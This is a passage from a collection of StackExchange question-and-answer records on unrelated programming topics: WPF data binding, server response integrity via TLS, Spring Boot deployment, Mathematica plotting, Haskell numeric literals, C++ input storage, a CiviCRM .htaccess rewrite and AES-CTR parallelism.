<\/GridViewColumn.CellTemplate> \n <\/GridViewColumn>\n <GridViewColumn Header=\"ID\" Width=\"120\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding ID}\" TextWrapping=\"Wrap\"\/>\n <\/DataTemplate>\n <\/GridViewColumn.CellTemplate>\n <\/GridViewColumn>\n <GridViewColumn Header=\"Location\" Width=\"125\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Location}\" TextWrapping=\"Wrap\"\/>\n <\/DataTemplate>\n <\/GridViewColumn.CellTemplate>\n <\/GridViewColumn>\n <\/GridView>\n <\/ListView.View>\n <\/ListView>\n <TextBox HorizontalAlignment=\"Left\" Height=\"19\" Margin=\"37,241,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=Location,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n\n<\/Grid>\n<\/Controls:MetroWindow>\n<\/code>\nComment: add it in your question\nComment: I want to add new record to my observablecollection\nComment: just add the object ti the collection\nComment: NotifyOnSourceUpdated=true,NotifyOnTArgetUpdated=true will help you\nAnswer: Since I could not use your code snippet to reproduce your issue accurately. So I have made a simple code sample to achieve your target as you described. I believe you would get some useful information form it and check your code to solve your problem.\n<code><Grid>\n <Grid.ColumnDefinitions>\n <ColumnDefinition>\n\n <\/ColumnDefinition>\n <ColumnDefinition>\n\n <\/ColumnDefinition>\n <\/Grid.ColumnDefinitions>\n\n <StackPanel Grid.Column=\"0\">\n <TextBox Text=\"{Binding name,Mode=TwoWay}\"><\/TextBox>\n\n <TextBox Text=\"{Binding Id,Mode=TwoWay}\"><\/TextBox>\n\n <TextBox Text=\"{Binding location,Mode=TwoWay}\"><\/TextBox>\n\n <Button Content=\"add new\" Command=\"{Binding AddNew}\"><\/Button>\n <\/StackPanel>\n\n <ListView ItemsSource=\"{Binding persons}\" Grid.Column=\"1\">\n <ListView.ItemTemplate>\n <DataTemplate>\n <StackPanel>\n <TextBlock Text=\"{Binding Name}\"><\/TextBlock>\n <TextBlock Text=\"{Binding ID}\" Margin=\"10 0 0 0\"><\/TextBlock>\n\n <TextBlock Text=\"{Binding Location}\" Margin=\"20 0 0 0\"><\/TextBlock>\n <\/StackPanel>\n <\/DataTemplate>\n <\/ListView.ItemTemplate>\n <\/ListView>\n<\/Grid>\n<\/code>\nMainViewModel.cs\n<code>class MainViewModel:ViewModelBase\n{\n public ObservableCollection<PersonModel> persons { get; set; }\n\n private string _name;\n public string name\n {\n get { return _name; }\n set\n {\n _name = value;\n RaisePropertyChanged(\"name\");\n }\n }\n\n private string _Id;\n\n public string Id\n {\n get { return _Id; }\n set { _Id = value;\n RaisePropertyChanged(\"Id\");\n }\n }\n\n private string _location;\n\n public string location\n {\n get { return _location; }\n set { _location = value;\n RaisePropertyChanged(\"location\");\n }\n }\n\n public RelayCommand AddNew { get; set; }\n\n public MainViewModel()\n {\n persons = new ObservableCollection<PersonModel>();\n persons.Add(new PersonModel() {Name=\"test1\",ID=\"123\",Location=\"u.s.\" });\n AddNew = new RelayCommand(AddNewPerson);\n }\n\n private void AddNewPerson()\n {\n PersonModel p = new PersonModel() {Name=name,ID=Id,Location=location };\n persons.Add(p);\n }\n}\n<\/code>\nPersonModel.cs\n<code>class PersonModel\n{\n public string Name { get; set; }\n\n public string ID { get; set; }\n\n public string Location { get; set; }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Get TextBox Value in ViewModel","dup_signals":{}},"subset":"stackexchange"} 
+{"text":"Make sure the data came from the server\n\nQuestion: So a web app grabs data from a server with ajax. I'm interested to know whether there is some cryptography wizardy that would make sure the data came from that server. For example, someone can edit their hosts file and use a different server for the domain and pass different data to the web app without modifying it. \nI'm thinking on something like this: \n<code>Server:\ndata_to_send \/\/ stringified json\nintegrity_code = getCode(data_to_send); \/\/generates a code from the string.\n\nThe server outputs data_to_send and integrity_code\n\nThen the client \nif (checkCode(data_to_send, integrity_code))\n \/\/all fine\n<\/code>\nI'm a total newbie to cryptography, but the idea is to have some secret algorithm on the server which no one can see and public algorithm on the client that determines if data is integral. Can something like that be done?\nComment: SSL\/TLS does just that.\nComment: if someone wants to interact with a different site, there's easier ways of doing that than manipulating your app's host usage, i don't understand the concern.\nAnswer: The simplest solution is to implement TLS encryption and use it when querying the server. TLS traffic between the server and the other server hosting your webapp is going to be encrypted and the authority of the server properly validated. Having SSL\/TLS installed however, does not automatically mean your app is using it, you still have to change the endpoint URLs from <code>http:\/\/<\/code> to <code>https:\/\/<\/code> in your ajax requests.\nEdit: pragmatically I recommend <code>letsencrpyt<\/code> if using linux, it's no more than 5 minutes to be installed for apache or nginx.\nComment: I can second using the EFF's project, let's encrypt (https:\/\/letsencrypt.org\/). I used it on my server, which I host multiple sites on, and it was VERY easy to setup. My blog for validation https:\/\/www.DotNetRussell.com it's pretty good too. I got an A- on SSLLabs https:\/\/www.ssllabs.com\/ssltest\/analyze.html?d=dotnetrussell.com not bad for a raspberry pi lol\nComment: I'm already using Letsencrypt. But will SSL ensure the data comes from the server, even when user changed the domain in hosts file and serving the request from his own server, which also has SSL?\nComment: CA's prove the authority of the server reliably as they have no access to your local hosts files. Certs are issued for a specific domain which in public DNS points to your IP.\nAnswer: If the user of your system is motivated to subvert the client side of your system, then there's little you can do. Digital Rights Management (DRM) systems try to do something similar, with limited success. \nIf going down this path can be avoided, it should be. \nComment: How come it isn't to do with DRM? The requester is explicitly saying that he wants to protect against situations where the end user could change \/etc\/hosts file and point to another server and his application should be protected against that.\nComment: @LukePark you should realize that if the user changes \/etc\/hosts file, and trusts his\/her own CA, you can easily impersonate any website. Done all the time.\nComment: This doesn't really have anything to do with DRM. A client can ensure it is communicating with the server it thinks it is through the use of TLS.\nComment: You should probably read up on how TLS works. 
Even if the user changed their hosts file to a different server, that server wouldn't be able to act as the original because it doesn't have the private key of the original server.\nComment: Yes, this is exactly what I meant. To make it harder to reverse engineer it.\nComment: They would need a CA to sign a certificate for the same domain as the one they are trying to impersonate... Which no actual CA would do unless the person who is applying actually controlled that domain... Which the attacker obviously doesn't.\nComment: You can easily mint your own CA and trust in your browser. And have that CA sign any certificate of your choice. The requester is saying that the user is motivated to subvert the security, and wants to make reverse engg harder.\nComment: I thought we were assuming the use of certificate pinning here? This **is** possible without certificate pinning or HSTS but I assume they would be implemented here. In which case, it is not possible.\nComment: @LukePark: pinning might prevent this, but _browser_ builtin pinning can usually be altered by a skilled user, and so can any pin done by app logic running in the browser. HSTS doesn't try; it requires HTTPS not HTTP (defeating sslstrip and things like Firesheep) but doesn't change the normal rule of trusting every CA in the truststore.\nAnswer: As mentioned in another answer, TLS (HTTPS) includes authentication, which is intended to provide the sort of guarantee you're looking for. There are also a variety of other cryptographic tools for the more general problem; GPG is a common signing tool for email, for example.\nHowever, while your gut instinct to not trust that the server you're querying is the right one is correct, you haven't taken it far enough. You should generally assume that any code that runs on the client can be subverted entirely - so if an attacker wants to, they can just change the code so it doesn't make any requests at all, and just uses some hard-coded values that they want.\nIn client-server models like web apps and online games, the way to prevent this is to always verify actions on the server. You can still do calculations on the client, but never consider them to be trusted; everything has to be verified by the server before it's considered truth. I don't know what your app is doing specifically, but to provide an example from ecommerce, you can't just trust the client to tell you that they've paid for something; the server needs to do the payment processing (or send it off to an external trusted service to do that), and only then do you proceed with shipping them their item.\nComment: Yes I'm aware of it. But now I thought, this is not the solution to what I want. Chrome extensions can have permissions to read and change data on websites I guess it also includes encrypted websites. Someone could make an extension that would change the ajax data. But if I encrypted the message on the server and decrypted on the client, it would be much harder to do and would require modification of source code, am I right? I just want to prevent scenarios where the response could be tampered without even touching the source code.\n","meta":{"source":"security.stackexchange","title":"Make sure the data came from the server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Confused on how to properly work on \/ install Spring files\n\nQuestion: I am trying to set up a simple restful API on my Linode server for my Android app to communicate with. 
I am new to the area of server software and setup.\nSo I have this guide:\nhttps:\/\/spring.io\/guides\/gs\/rest-service\/#scratch\nAm I developing this project on my local machine and then, at the end, somehow moving it all over to the server? I am confused how I \"install the Spring framework\" on the server, even with this guide, or what exactly I need to do to set things up.\nAm I supposed to create the whole thing locally, generate the jar, upload that jar to the server, and just run it directly there and it'll handle the rest?\nAnswer: As this is a spring boot application, you will have two possibilities:\nThe default is to just build the projects jar and run it on the target system, because spring boot allows you to embed a tomcat container into your project.\nThe second one would be to package your project into a .war file (<code>packaging<\/code> property in the <code>pom.xml<\/code>) and deploy this .war file in a tomcat container you previously installed on the server.\nEDIT:\nYou don't have to \"install the spring framework on your server\". You app is based on the spring framework, that's it. Just build your app (with maven or gradle according to the tutorial) and run the .jar on the server (<code>java -jar yourapp.jar<\/code>). As there is an embedded, pre-configured tomcat included in the spring-boot framework, it will run the tomcat, deploy your app and run the app for you.\nComment: Can I build this Spring app in Android Studio or do I need to use something like IntelliJ IDEA?\nComment: i think it's make more sense to use something else than Android Studio. I bet it would work, but it's specialized to develop android apps. Use eclipse or intelliJ instead.\nAnswer: First of all you need to understand that spring is an application, to connect to that application you need any server to deploy your application like Tomcat, GlassFish, etc.\nOnce you have your own server, you need to export your spring.jar or spring.war to the server to make it running.\nThen when the app is running you can connect to that using the URLNameOfYourServer\/YourSpringApp\nAnother thing is when you are using STS, Eclipse, Netbeans, Intellij those IDES uses embedded server to deploy and test your app.\nIf you want to create your own server, make sure you have installed java and tomcat then deploy your app.\nComment: Well yes, but it's not forbidden to use the embedded tomcat in production. Many people do so successfully. It just depends on what you need. If you only want one app per container anyway, the embedded tomcat is a nice feature to use, here.\nComment: I don't see anywhere in the online guide I linked above that I need to install Tomcat?\nComment: I use an easy way with pivotal cloud foundy [Link Here](https:\/\/pivotal.io\/platform) look at the starter guide for spring apps if your are new configuring web servers this should be the best choice for you.\nComment: @IvanLynch This ultimately redirects to the same tutorial pages I already linked\nComment: Check this [Host your application in Linode](https:\/\/www.linode.com\/docs\/websites\/hosting-a-website), install apache tomcat following the guide. Once apache is installed copy your war file to webapps directory of Apache tomcat\n","meta":{"source":"stackoverflow","title":"Confused on how to properly work on \/ install Spring files","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plots are clipped randomly (almost)\n\nQuestion: I am experiencing a strange behavior in plotting a lot of functions. 
Basically, they are clipped within an horizontal range. Let try to run this code by varying nmax, it could be a problem of my specific configuration(?). I know that is not a problem about Manipulate since I can reproduce the same behavior with a static plot. Rather it seems to be a problem related to point numbers, indeed if you try to sharpen the gaussians the problem appears.\n<code>nmax = 5;\nManipulate[\nDynamicModule[{rr = r[[1 ;; n]], ss = s[[1 ;; n]], \n ww = w[[1 ;; n]]},\n Show[\n Plot[Table[\n PDF[NormalDistribution[rr[[i]], ss[[i]]], x], {i, 1, n}], {x, 0, \n 5}, PlotRange -> {{0, 5}, {0, 1.4}}, Frame -> True]\n ]\n ],\n{{r, RandomReal[{0, 3}, nmax]}, ControlType -> None},\n{{s, RandomReal[{0.01, 1}, nmax]}, ControlType -> None},\n{{w, RandomReal[{0, 1}, nmax]}, ControlType -> None},\n{{n, 1}, 1, nmax, 1},\nDynamic[\nGrid[\nTable[With[{i = i},\n {Row[{Slider[Dynamic[r[[i]]], {0, 5, 0.1}], Dynamic[r[[i]]]}], \n Row[{Slider[Dynamic[s[[i]]], {0.01, 1, 0.1}], \n Dynamic[s[[i]]]}]}\n], {i, n}]\n]\n],\nControlPlacement -> Left\n]\n<\/code>\nWhat do you think about?\nThank you very much\nF\nComment: I don't understand what you mean is clipped. Can you show with an image? I run your code, and nothing strange appears to me. Some of the graphs go outside the PlotRange that is explicitly given, but that is not surprising.\nComment: Why not post the (probably simpler) code for the static image?\nComment: Because it would not be simpler than this, since it involves kernel density estimation computation, a histogram, the pdf reconstruction and its \"manual\" reconstruction. The code above reproduces the same effect\/problem but with less code... and the solution is to give the right option in Plot[] (I guess)\nAnswer: This is the problem you are seeing:-\n\nIn your code <code>Show<\/code> is actually doing nothing, since <code>Plot<\/code> is plotting all the tabled functions (and that's where the problem is occurring). The problem is fixed by by rearranging <code>Plot<\/code> and <code>Table<\/code> so that plots are tabled, then shown with <code>Show<\/code>. I.e.\n<code>nmax = 5;\nManipulate[\n DynamicModule[{rr = r[[1 ;; n]], ss = s[[1 ;; n]], ww = w[[1 ;; n]]},\n Show[Table[Plot[PDF[NormalDistribution[rr[[i]],\n ss[[i]]], x], {x, 0, 5}, PlotRange -> {{0, 5}, {0, 1.4}}, Frame -> True],\n {i, 1, n}]]],\n {{r, RandomReal[{0, 3}, nmax]}, ControlType -> None},\n {{s, RandomReal[{0.01, 1}, nmax]}, ControlType -> None},\n {{w, RandomReal[{0, 1}, nmax]}, ControlType -> None}, {{n, 1}, 1, nmax, 1},\n Dynamic[Grid[Table[With[{i = i},\n {Row[{Slider[Dynamic[r[[i]]], {0, 5, 0.1}], Dynamic[r[[i]]]}],\n Row[{Slider[Dynamic[s[[i]]], {0.01, 1, 0.1}], \n Dynamic[s[[i]]]}]}], {i, n}]]],\n ControlPlacement -> Left]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Plots are clipped randomly (almost)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Int literal in Haskell\n\nQuestion: I am trying out code examples from the book \"The Craft of Functional Programming\".\nI want to create a Tree that has <code>Int<\/code>s in it but I seem to ended up creating a Tree with Integers in it (please see execution in GHCi below). \nHow can I create a Tree with <code>Int<\/code>s in it ? 
Is there a way to write an <code>Int<\/code> literal in Haskell ?\n<code>*Chapter18> sumTree myTree\n\n<interactive>:35:9:\n Couldn't match type `Integer' with `Int'\n Expected type: Tree Int\n Actual type: Tree Integer\n In the first argument of `sumTree', namely `myTree'\n In the expression: sumTree myTree\n In an equation for `it': it = sumTree myTree\n<\/code>\nHere is the corresponding code:\n<code>-- A type of binary trees.\nmyTree = Node 2 (Nil) (Nil)\n\ndata Tree a = Nil | Node a (Tree a) (Tree a)\n\n-- Summing a tree of integers\n\n-- A direct solution:\n\nsTree :: Tree Int -> Int\n\nsTree Nil = 0\nsTree (Node n t1 t2) = n + sTree t1 + sTree t2\n\n-- A monadic solution: first giving a value of type Id Int ...\n\nsumTree :: Tree Int -> Id Int\n\nsumTree Nil = return 0\n\n--sumTree (Node n t1 t2)\n-- = do num <- return n\n-- s1 <- sumTree t1\n-- s2 <- sumTree t2\n-- return (num + s1 + s2)\nsumTree (Node n t1 t2) =\n return n >>=(\\num ->\n sumTree t1 >>= (\\s1 ->\n sumTree t2 >>= (\\s2 ->\n return (num + s1 + s2))))\n-- ... then adapted to give an Int solution\n\nsTree' :: Tree Int -> Int\n\nsTree' = extract . sumTree\n\n-- where the value is extracted from the Id monad thus:\n\nextract :: Id a -> a\nextract (Id x) = x\n<\/code>\nAnswer: Monomorphism restriction strikes again! Because <code>myTree<\/code> doesn't have any arguments, the compiler avoids making it polymorphic. But the numerical literal is polymorphic (there are no <code>Int<\/code> literals, only integral <code>Num<\/code> literals!), so the compiler needs to decide upon some <code>Num<\/code> type. Well, <code>Int<\/code> could be a problem if you're dealing with huge numbers, so it chooses <code>Integer<\/code>.\nGiving <code>myTree<\/code> an explicit signature would have prevented that; either use\n<code>myTree :: Num a => Tree a\n<\/code>\nOr\n<code>myTree :: Tree Int\n<\/code>\n","meta":{"source":"stackoverflow","title":"Int literal in Haskell","dup_signals":{}},"subset":"stackexchange"} +{"text":"storing all user inputs and display later\n\nQuestion: I'm nearly finishing my practice program but I got stucked on storing user inputs in an unspecified size of an array..\nPlease have a look at my code:\n<code>#include <iostream>\n#include <stdlib.h>\n#include <string>\n#include <ctype.h>\n#include <cstring>\n\nusing namespace std;\n\nint main() {\n\n string items[9][3] = {{\"A\",\"BALOT\",\"25.00\"},\n {\"B\",\"CANTON\",\"20.00\"},\n {\"C\",\"NIDO\",\"100.00\"},\n {\"D\",\"KETCHUP\",\"50.00\"},\n {\"E\",\"MAGGI\",\"15.00\"},\n {\"F\",\"ALASKA\",\"60.00\"},\n {\"G\",\"VINEGAR\",\"25.00\"},\n {\"H\",\"OIL\",\"70.00\"},\n {\"I\",\"COKE\",\"10.00\"}};\n\n \/\/ PARA MAPRINT YUNG ARRAY.\n cout << \"MANG JUAN'S 10-DAHAN\\n\\n\";\n for (int i = 0; i < 9; i++) {\n for (int j = 0; j < 3; j++)\n cout << items[i][j] << ( (j < 2) ? \"-\" : \"\\t\" ); \n\n if (i < 6) {\n cout << \"\\t\";\n i += 2;\n }\n else if (i != 8) { \n cout << \"\\n\";\n i -= 6;\n }\n } \/\/ END OF ARRAY PRINTING\n\n char choice, addAnother;\n int ctr = 1, quantity = 0;\n string purchased;\n double price = 0, grandTotal = 0, total = 0;\n\n cout << \"\\n\\nWOULD YOU LIKE TO PURCHASE? 
Y\/N\\n\\n\";\n cin >> choice;\n\n if(choice == 'n' || choice == 'N') {\n cout << \"THANK YOU.\";\n }\n else if(choice == 'y' || choice == 'Y') {\n\n string numPref;\n while (true) {\n if(ctr > 11) {\n cout << \"\\n\\nTHE SYSTEM EXCEEDED ITS LIMIT\\n\\n\";\n break;\n } else {\n if(ctr == 1) numPref = \"st\";\n else if(ctr == 2) numPref = \"nd\";\n else if(ctr == 3) numPref = \"rd\";\n else if(ctr > 3) numPref = \"th\";\n }\n\/\/rows:\n \/\/for(int r = 0; r < 9; r++) {\n cout << \"\\n\\nPLEASE ENTER \" << ctr << numPref << \" ITEM:\\t\";\n cin >> purchased;\n\n char upp = purchased[0];\n upp = toupper(upp);\n purchased = upp;\n\n if(!cin) { \n cout << \"Letters only\";\n break;\n } else {\n if(true) {\n cout << \"HOW MANY? \";\n cin >> quantity;\n if(!cin) {\n cout << \"Enter number only. \";\n break;\n } else {\n cout << \"PRICE PER ITEM: \";\n\n \/\/\/\/\/\/\/\/\/ Look for the element and print the entire row \/\/\/\/\/\/\/\/\/\/\/\/\/\n string *matchedRow;\n const int length = 9;\n for (int i = 0; i < 9; i++) {\n string *oneRow = items[i];\n \/**if (oneRow[0] != purchased) {\n cout << \"\\n\\nNO ITEM FOUND!\\n\\n\";\n ctr--;\n } else {\n matchedRow = oneRow;\n cout << matchedRow[2];\n price = atof( matchedRow[2].c_str() ); \n total = price * quantity;\n grandTotal += total; \n } *\/\n\n if(oneRow[0] == purchased) {\n matchedRow = oneRow;\n cout << matchedRow[2];\n price = atof( matchedRow[2].c_str() ); \n total = price * quantity;\n grandTotal += total;\n\n if(oneRow[0] != purchased) {\n cout << \"NO MATCH FOUND!\" << endl;\n ctr--;\n break;\n }\n\n }\n\n } \/\/ End of for-loop for *matchedrow\n \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n cout << \"\\n\\nADD ANOTHER ITEM? Y\/N \" << endl;\n cin >> addAnother;\n if(addAnother == 'y' || addAnother == 'Y') {\n ctr++; \n } else if(addAnother == 'n' || addAnother == 'N') {\n \/\/ print the receipt here\n goto receipt;\n \/\/break; \/\/ replace break with goto later\n } else {\n cout << \"\\n\\nINVALID INPUT.\" << endl;\n break;\n } \/\/ End of if and else for addANother\n }\n\n } \/\/ end of else - if (!cin) for quantity input check\n } \/\/ end of char check\n\n \/\/} \/\/ End of else for (!cin) \/\/spare bracket\n\n } \/\/ End of while-loop for numPref\n \/\/} \/\/ end of rows for-loop \n } \/\/ End of else if (choice)\nreceipt:\n cout << \"YOUR PURCHASE:\" << endl;\n cout << \"NET TOTAL: \" << grandTotal << endl;\n system(\"PAUSE\");\n \/\/return 0;\n\n}\n<\/code>\nI want to output the purchase summary like this sample run:\n<code>WOULD YOU LIKE TO PURCHASE? Y\nPLEASE ENTER 1st ITEM: A\nHOW MANY? 2\nPRICE PER ITEM: 25.00\n\nADD ANOTHER? Y\n\nPLEASE ENTER 2nd ITEM: B\nHOW MANY? 1\nPRICE PER ITEM: 20.00\n\nADD ANOTHER? N\n\nYOUR PURCHASE:\n\/\/ will display all the ordered item\n\/\/ sample output\nA BALOT 50.00\nB CANTON 20.00\n\nNET TOTAL: 70.00\n<\/code>\nComment: This is *screaming* for a well-defined `struct` or `class` that contains the choice-letter, description, and an `int` for the price in pennies (not a float or double; rounding sucks). That aside, do you know what a `std::vector<>` is useful for?\nComment: Honestly, its more important than even `std::string`. If you asked me which is the *first* standard library class you should learn everything about, `std::vector<>` would likely be the choice.\nComment: I'm not yet familiar of std::vector<> since I'm new to C++\nAnswer: You cannot have an array of unspecified size. 
Use <code>vector<\/code> instead, for example:\n<code>#include<vector>\n... \nvector<string> user_inputs;\nstring purchased;\ncin >> purchased;\nuser_inputs.push_back(purchased); \/\/adding to vector\n<\/code>\nThen you can get back your inputs:\n<code>for (int j = 0; j < user_inputs.size(); j++)\n cout << user_inputs[j];\n<\/code>\nComment: how do you print an entire row if the user_input matches an element in an array?\nAnswer: -As someone mentioned, abstraction is needed here, but you can choose to implement that if you wish\n<code>#include <deque>\n#include <string>\n#include <iostream>\n#include <limits>\n#include <cstdlib>\n#include <iomanip>\n#include <cctype>\n\nusing std::cout;\nusing std::endl;\nusing std::cin;\nusing std::string;\n\ntypedef std::deque<string> dstr;\ntypedef std::deque<dstr> ddstr;\n\nstruct purchase_index {\n string name;\n double amt;\n struct purchase_index *next;\n} purchases;\n\nconst char *prefix[] = {\"st\", \"nd\", \"rd\", \"th\"};\n\nint query( const unsigned );\nvoid print_options(ddstr &);\nunsigned add_purchase( purchase_index *, ddstr & );\nvoid clrscr();\nvoid print_purchase_hist(struct purchase_index *, char = '$');\n\nint main() {\n ddstr items = {{\"A\",\"BALOT\",\"25.00\"},\n {\"B\",\"CANTON\",\"20.00\"},\n {\"C\",\"NIDO\",\"100.00\"},\n {\"D\",\"KETCHUP\",\"50.00\"},\n {\"E\",\"MAGGI\",\"15.00\"},\n {\"F\",\"ALASKA\",\"60.00\"},\n {\"G\",\"VINEGAR\",\"25.00\"},\n {\"H\",\"OIL\",\"70.00\"},\n {\"I\",\"COKE\",\"10.00\"}\n };\n\n struct purchase_index *ptr = &purchases;\n\n unsigned char prompt = 'y'; \n cout << \"\\n\\nWOULD YOU LIKE TO PURCHASE? \";\n int purchase(1);\n\n while ( (cin >> prompt) and (prompt|32) == 'y' ) {\n print_options(items);\n if ( !query(purchase) ) break;\n else if ( add_purchase(ptr, items) ) {\n purchase++;\n ptr = (ptr->next = new struct purchase_index());\n }\n cout << \"ADD ANOTHER? \";\n }\n\n print_purchase_hist(&purchases);\n\n return 0;\n}\n\nvoid print_purchase_hist(struct purchase_index *hist, char currency) {\n cout << \"\\n\\nYOUR PURCHASE:\\n\";\n struct purchase_index *ptr = hist;\n while (ptr->next != NULL){\n cout << ptr->name << \"\\t\" << currency << ptr->amt << '\\n';\n ptr = ptr->next;\n }\n}\n\ninline void clrscr() {\n cin.ignore(std::numeric_limits<std::streamsize>::max(), '\\n');\n cout << std::setfill('\\n') << std::setw(2) << '\\n';\n}\n\nunsigned add_purchase( purchase_index *ptr, ddstr &itm ) {\n unsigned char w;\n unsigned num, index, ret(1);\n if ( !(cin >> w) or (index = (toupper(w) - 65)) >= itm.size() ) {\n cout << \"NO MATCH FOUND!\\n\";\n ret = 0;\n }\n else if ( cout << \"HOW MANY? \" and !(cin >> num) ) {\n cout << \"Enter Numbers only.\\n\";\n ret = 0;\n }\n else {\n ptr->name = itm[index][0] + \"\\t\" + itm[index][1];\n ptr->amt = (double)num * atof(itm[index][2].c_str());\n }\n clrscr();\n return ret;\n}\n\nvoid print_options(ddstr &ref) {\n cout << \"Items you can purchase:\\n\";\n for ( auto desc: ref ) {\n cout << \"\\t\";\n for ( auto spec: desc )\n cout << spec << \" \";\n cout << endl;\n }\n}\n\nint query( const unsigned item_list ) {\n if ( item_list > 11 ) {\n cout << \"\\n\\nTHE SYSTEM EXCEEDED ITS LIMIT\\n\\n\";\n return 0;\n }\n unsigned last = item_list % 10;\n cout << \"PLEASE ENTER THE \" << item_list\n << ( last == 0 || last > 3 ? prefix[3] : prefix[last-1] )\n << \" ITEM: \";\n return 1;\n}\n<\/code>\nSample Run:\n<code>WOULD YOU LIKE TO PURCHASE? 
y\nItems you can purchase:\n A BALOT 25.00 \n B CANTON 20.00 \n C NIDO 100.00 \n D KETCHUP 50.00 \n E MAGGI 15.00 \n F ALASKA 60.00 \n G VINEGAR 25.00 \n H OIL 70.00 \n I COKE 10.00 \nPLEASE ENTER THE 1st ITEM: e\nHOW MANY? 3\n\nADD ANOTHER? y\nItems you can purchase:\n A BALOT 25.00 \n B CANTON 20.00 \n C NIDO 100.00 \n D KETCHUP 50.00 \n E MAGGI 15.00 \n F ALASKA 60.00 \n G VINEGAR 25.00 \n H OIL 70.00 \n I COKE 10.00 \nPLEASE ENTER THE 2nd ITEM: c\nHOW MANY? 5\n\nADD ANOTHER? n\n\nYOUR PURCHASE:\nE MAGGI $45\nC NIDO $500\n<\/code>\n","meta":{"source":"stackoverflow","title":"storing all user inputs and display later","dup_signals":{}},"subset":"stackexchange"} +{"text":"CiviCRM is defaulting to uppercase path\n\nQuestion: Somehow CiviCRM is wanting to use the path \/CiviCRM (notice the case) instead of all lowercase civicrm. This has been fine until I upgraded to Civi 5.27 and now the civicrm?civiwp implementation results in a 404. I can change the case manually and it will work but the automatically generated URLs use all lowercase.\nFor example:\nhttps:\/\/www.domain.org\/civicrm?civiwp=CiviCRM&q=civicrm%2Fevent%2Fregister&reset=1&id=24 == 404 Not Found\nhttps:\/\/www.domain.org\/CiviCRM\/?civiwp=CiviCRM&q=civicrm%2Fevent%2Finfo&reset=1&id=24 == working\nThis is also breaking images in my Mosaico templates.\nExample of a Mosaico image:\nhttps:\/\/www.domain.org\/civicrm?civiwp=CiviCRM&q=civicrm%2Fmosaico%2Fimg&src=https%3A%2F%2Fwww.domain.org%2Fwp-content%2Fuploads%2Fcivicrm%2Fpersist%2Fcontribute%2Fimages%2Fuploads%2Fdcs_e1de5c0ee5de2a85bb86821132d2aaba.png&method=resize¶ms=166%2Cnull\nIf you change the link to \/CiviCRM?civiwp=CiviCRM.... it works.\nI have verified that the permalink on the page is lowercase as well as the CMS Database Integration in Civi. Has anyone seen this behavior or have any suggestions for how I can correct it?\nUPDATE:\nAdding the following lines to my htaccess fixes this as a workaround. Still not sure why it is defaulting to CiviCRM instead of civicrm. Hopefully if this is happening to you, you can use this patch.\n<code>RewriteCond %{REQUEST_URI} !^\/wp-content\/\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R,L]\n<\/code>\nAnswer: Can you check the CMS Settings <code>https:\/\/yoursite.org\/\/wp-admin\/admin.php?page=CiviCRM&q=civicrm%2Fadmin%2Fsetting%2Fuf&reset=1<\/code> and see what you see?\nI suspect it looks like:\n\nCan you also check the WP Page 'CiviCRM' I suspect the slug is not 'civicrm' lowercase. These values must match in order for the urls to resove.\nComment: Hi Kevin, thanks for the quick reply. Both the page slug and Base Page are lowercase. I've updated my question with the screenshots of each.\nComment: That is really odd. As they both match it should work. Is it possible there is a civicrm folder in the web root\nComment: Even stranger is that if you go to \/civicrm it gives you a server side 404. If you go to any other non existent folder (ie. \/civistack) it will serve a html page 404. I can't even do a 301 rewrite for the \/civicrm folder to force it to CiviCRM. This is really strange.\nComment: Can anyone add further suggestions or insight? This is breaking Mosaico templates and we're not able to send mailings. See the two new examples in the original post. \nCould I use a rewrite in the htaccess to rewrite all requests for civicrm?civiwp= to CiviCRM?civiwp= ? If so, how would I do that? Thanks!\nComment: Partial answer... adding the following in htaccess fixes the links but breaks the admin pages for civi... 
getting closer to a workaround...\n\nRewriteRule ^(.*)\/civicrm(.*)$ \/CiviCRM\/$2 [L]\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R,L]\nAnswer: This is a .htaccess workaround but I have tested and verified that it works. Please the following in your root .htaccess file or httpd-app.conf:\n<code>RewriteCond %{REQUEST_URI} !^\/wp-content\/\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R=301,L]\n<\/code>\nIf someone from the community cares enough to look into why this is defaulting to CiviCRM when everything is set to civicrm, please do. Otherwise this band-aid will have to do.\n","meta":{"source":"civicrm.stackexchange","title":"CiviCRM is defaulting to uppercase path","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can one parallelize tasks in CTR-AES for maximum performance?\n\nQuestion: From what I have read it seems like one of the purported benefits of using CTR mode AES, is that it can be parallelized to a greater degree, or maybe more easily than the other block cipher modes, leading to performance gains?\nIn NIST SP800-38A \u00a76.5 , it says: \n\nIn both CTR encryption and CTR decryption, the forward cipher functions can be performed in parallel...\n\nAnd this answer to \"Decryption a chunk of file with AES\", if I understand correctly, suggests that basically you have one task do $$O_j=CIPH_K(T_j) \\text{ for } j=1,2...\\frac{n}{2}$$ with another task doing $$O_j=CIPH_K(T_j) \\text{ for } j=\\frac{n}{2},\\frac{n}{2}+1...n$$ in parallel. \nIs this what NIST SP800-38A, was referring to, something along these lines?\nOr are there more or better ways to parallelize things?\nAnswer: From the diagram on CTR mode\nyou can notice that there are no dependencies between any of the phases of the pipeline. If you have more than one block-size worth of data, you can process each block-size chunk completely independently of the others by calculating $\\mathrm{ciphertext}_i = E(\\mathrm{key}, \\mathrm{nonce} \\, || \\, \\mathrm{counter}_i) \\oplus \\mathrm{plaintext}_i$.\nComment: $\\vert\\vert$ is concatenation, $\\oplus$ is XOR.\nComment: Okay i see. In $\\mathrm{ciphertext}_i = E(\\mathrm{nonce} \\, || \\, \\mathrm{counter}_i) \\oplus \\mathrm{plaintext}_i$, does $||$ just mean concatenation or ?\nAnswer: Generally, it depends on the architecture.\nIf you have $n$ processors 